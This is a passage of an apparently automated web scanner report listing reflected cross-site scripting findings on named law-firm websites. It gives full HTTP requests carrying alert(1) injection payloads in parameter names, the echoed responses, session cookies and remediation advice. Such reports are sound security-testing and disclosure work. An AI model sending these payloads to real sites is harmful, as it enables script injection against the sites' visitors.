Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1142; path=/
Set-Cookie: PortletId=1133501; path=/
Set-Cookie: SiteId=1087; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 247989


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<title id="ctl00_htmlTitle">Covington &amp; Burling LLP | Practices, Industries & Regions</title>
<meta
...[SNIP]...
<![CDATA[
document.aspnetForm.action = '/practice/' + document.aspnetForm.action;var myForm=document.forms['aspnetForm'];if(!myForm){myForm=document.aspnetForm;}myForm.action='/practice/Services.aspx?f4da1'-alert(1)-'610b8b730dc=1';//]]>
...[SNIP]...

2.27. http://www.cov.com/practice/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cov.com
Path:   /practice/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c53e5'-alert(1)-'9529b8f7a51 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /practice/?c53e5'-alert(1)-'9529b8f7a51=1 HTTP/1.1
Host: www.cov.com
Proxy-Connection: keep-alive
Referer: http://www.cov.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; SERVER_PORT=80; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Mode=1; EventingStatus=1; NavId=0; PortletId=0; SiteId=0; ZoneId=0

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 16:56:09 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000338
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-HUBRD-A35
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1142; path=/
Set-Cookie: PortletId=1133501; path=/
Set-Cookie: SiteId=1087; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Cteonnt-Length: 247989
Content-Length: 247989


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<title id="ctl00_htmlTitle">Covington &amp; Burling LLP | Practices, Industries & Regions</title>
<meta
...[SNIP]...
<![CDATA[
document.aspnetForm.action = '/practice/' + document.aspnetForm.action;var myForm=document.forms['aspnetForm'];if(!myForm){myForm=document.aspnetForm;}myForm.action='/practice/Services.aspx?c53e5'-alert(1)-'9529b8f7a51=1';//]]>
...[SNIP]...

2.28. http://www.cov.com/privacypolicy [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cov.com
Path:   /privacypolicy

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload df5e0'-alert(1)-'cd34e2cebf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /privacypolicy?df5e0'-alert(1)-'cd34e2cebf=1 HTTP/1.1
Host: www.cov.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:42:27 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000338
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-HUBRD-A35
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1164; path=/
Set-Cookie: PortletId=1155501; path=/
Set-Cookie: SiteId=1087; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 13182


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<title id="ctl00_htmlTitle">Covington &amp; Burling LLP | Privacy Policy</title>
<meta name="language" c
...[SNIP]...
nt.aspnetForm.action = '/privacypolicy/' + document.aspnetForm.action;var myForm=document.forms['aspnetForm'];if(!myForm){myForm=document.aspnetForm;}myForm.action='/privacypolicy/GeneralPageData.aspx?df5e0'-alert(1)-'cd34e2cebf=1';//]]>
...[SNIP]...

2.29. http://www.cov.com/probonooverview [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cov.com
Path:   /probonooverview

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload eb241'-alert(1)-'14889ea6214 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /probonooverview?eb241'-alert(1)-'14889ea6214=1 HTTP/1.1
Host: www.cov.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:33:31 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000338
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-HUBRD-A35
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1148; path=/
Set-Cookie: PortletId=1139501; path=/
Set-Cookie: SiteId=1087; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 25101


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<title id="ctl00_htmlTitle">Covington &amp; Burling LLP | Pro Bono | Overview</title>
<meta name="langua
...[SNIP]...
cument.aspnetForm.action = '/probonooverview/' + document.aspnetForm.action;var myForm=document.forms['aspnetForm'];if(!myForm){myForm=document.aspnetForm;}myForm.action='/probonooverview/ProBono.aspx?eb241'-alert(1)-'14889ea6214=1';//]]>
...[SNIP]...

2.30. http://www.cov.com/publications [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cov.com
Path:   /publications

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 37aa1'-alert(1)-'7b6396f21de was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /publications?37aa1'-alert(1)-'7b6396f21de=1 HTTP/1.1
Host: www.cov.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:37:38 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000338
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-HUBRD-A35
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1159; path=/
Set-Cookie: PortletId=1150501; path=/
Set-Cookie: SiteId=1087; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 158249


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<title id="ctl00_htmlTitle">Covington &amp; Burling LLP | Publications</title>
<meta name="language" con
...[SNIP]...
DATA[
document.aspnetForm.action = '/publications/' + document.aspnetForm.action;var myForm=document.forms['aspnetForm'];if(!myForm){myForm=document.aspnetForm;}myForm.action='/publications/List.aspx?37aa1'-alert(1)-'7b6396f21de=1';//]]>
...[SNIP]...

2.31. http://www.cov.com/recruitingthebestandbrightest [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cov.com
Path:   /recruitingthebestandbrightest

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c57c0'-alert(1)-'7612bb35499 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /recruitingthebestandbrightest?c57c0'-alert(1)-'7612bb35499=1 HTTP/1.1
Host: www.cov.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:45:17 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000338
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-HUBRD-A35
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1153; path=/
Set-Cookie: PortletId=1144501; path=/
Set-Cookie: SiteId=1087; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 15778


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<title id="ctl00_htmlTitle">Covington &amp; Burling LLP | Diversity | Recruiting the Best & Brightest</title>
...[SNIP]...
ecruitingthebestandbrightest/' + document.aspnetForm.action;var myForm=document.forms['aspnetForm'];if(!myForm){myForm=document.aspnetForm;}myForm.action='/recruitingthebestandbrightest/Diversity.aspx?c57c0'-alert(1)-'7612bb35499=1';//]]>
...[SNIP]...

2.32. http://www.cov.com/retainingourdiversetalent [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cov.com
Path:   /retainingourdiversetalent

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1c13f'-alert(1)-'a38ede21cf4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /retainingourdiversetalent?1c13f'-alert(1)-'a38ede21cf4=1 HTTP/1.1
Host: www.cov.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:47:34 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000338
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-HUBRD-A35
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1154; path=/
Set-Cookie: PortletId=1145501; path=/
Set-Cookie: SiteId=1087; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 17215


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<title id="ctl00_htmlTitle">Covington &amp; Burling LLP | Diversity | Retaining Our Diverse Talent</title>

...[SNIP]...
on = '/retainingourdiversetalent/' + document.aspnetForm.action;var myForm=document.forms['aspnetForm'];if(!myForm){myForm=document.aspnetForm;}myForm.action='/retainingourdiversetalent/Diversity.aspx?1c13f'-alert(1)-'a38ede21cf4=1';//]]>
...[SNIP]...

2.33. http://www.cov.com/sitemap [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cov.com
Path:   /sitemap

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a6862'-alert(1)-'2791e98804b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sitemap?a6862'-alert(1)-'2791e98804b=1 HTTP/1.1
Host: www.cov.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:33:06 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000338
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-HUBRD-A35
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1163; path=/
Set-Cookie: PortletId=1154501; path=/
Set-Cookie: SiteId=1087; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 33131


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<title id="ctl00_htmlTitle">Covington &amp; Burling LLP | Site Map</title>
<meta name="language" content
...[SNIP]...
<![CDATA[
document.aspnetForm.action = '/sitemap/' + document.aspnetForm.action;var myForm=document.forms['aspnetForm'];if(!myForm){myForm=document.aspnetForm;}myForm.action='/sitemap/Sitemap.aspx?a6862'-alert(1)-'2791e98804b=1';//]]>
...[SNIP]...

2.34. http://www.cov.com/termsofuse [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cov.com
Path:   /termsofuse

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ce89f'-alert(1)-'5ebc528209d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /termsofuse?ce89f'-alert(1)-'5ebc528209d=1 HTTP/1.1
Host: www.cov.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:42:38 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000338
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-HUBRD-A35
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1389; path=/
Set-Cookie: PortletId=3588901; path=/
Set-Cookie: SiteId=1087; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 28021


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<title id="ctl00_htmlTitle">Covington &amp; Burling LLP | Terms of Use</title>
<meta name="language" con
...[SNIP]...
document.aspnetForm.action = '/termsofuse/' + document.aspnetForm.action;var myForm=document.forms['aspnetForm'];if(!myForm){myForm=document.aspnetForm;}myForm.action='/termsofuse/GeneralPageData.aspx?ce89f'-alert(1)-'5ebc528209d=1';//]]>
...[SNIP]...

2.35. http://www.ebglaw.com/showoffice.aspx [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ebglaw.com
Path:   /showoffice.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 45f31'><script>alert(1)</script>f88730a84f4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /showoffice.aspx?Show=542&45f31'><script>alert(1)</script>f88730a84f4=1 HTTP/1.1
Host: www.ebglaw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:48:33 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Pragma: no-cache
Set-Cookie: ASP.NET_SessionId=wiqyja45mfzer0uwjqmgms45; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 63794

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head pro
...[SNIP]...
<a href='showoffice.aspx?Show=542&45f31'><script>alert(1)</script>f88730a84f4=1&PrintPage=True'>
...[SNIP]...

2.36. http://www.ebglaw.com/showoffice.aspx [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ebglaw.com
Path:   /showoffice.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5a79d'-alert(1)-'f0c22b0c26f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /showoffice.aspx?Show=542&5a79d'-alert(1)-'f0c22b0c26f=1 HTTP/1.1
Host: www.ebglaw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:48:34 GMT
Server: Microsoft-IIS/6.0
